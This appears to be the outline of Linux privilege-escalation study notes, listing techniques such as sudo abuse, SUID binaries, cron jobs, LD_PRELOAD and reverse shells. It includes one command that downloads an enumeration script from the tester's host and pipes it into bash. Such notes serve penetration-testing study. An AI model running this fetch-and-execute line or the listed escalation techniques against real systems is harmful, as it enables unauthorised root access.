3 PrivEsc
Every PrivEsc comes from a misconfiguration or Vulnerability
Enumerate
> lse.sh -l 1 -i
> curl $MyIP:8000/LinEnum.sh | bashREF: KernelExploits (ex: Dirty Cow)
GTFOBins
sudo -l
Password Reuse
PrivEsc Class
Editor Escapes
Other Escapes
find Escape
Pager Escapes
nc escape
chown/chmod
nmap escape
tmux escape
Console Browsers
Python read file
Python rootbash
Programming Escapes
Sudo Error Read
Perms
Special perms
View perms
Users have 3 ids
Spawn a Root Shell
Root Shell: Bash
Copy Bash
Root Shell: C
Root Shell: SUID
rootbash
Root Shell: service
Root Shell: function
Root Shell: SO
Reverse Shell Generator: Suggestion Tool
More Rev Shells:
Reverse Shell: msfvenom
Reverse Shell: perl
Service Exploits
MySql
Port Forward Localhost
shadow
passwd
Environment Variables
LD_PRELOAD
LD_LIBRARY_PATH
Crons
Cron Script (Python)
Crontab PATH
Wildcard tar touch checkpoint
SUID/SGID
Perl
Ruby
Node
Shared Object Injection
Path Environment Variable:
Bash Functions
Bash PS4 Debug
SSH Keys
NFS Root Squashing
wget
chkrootkit
ORM
Last updated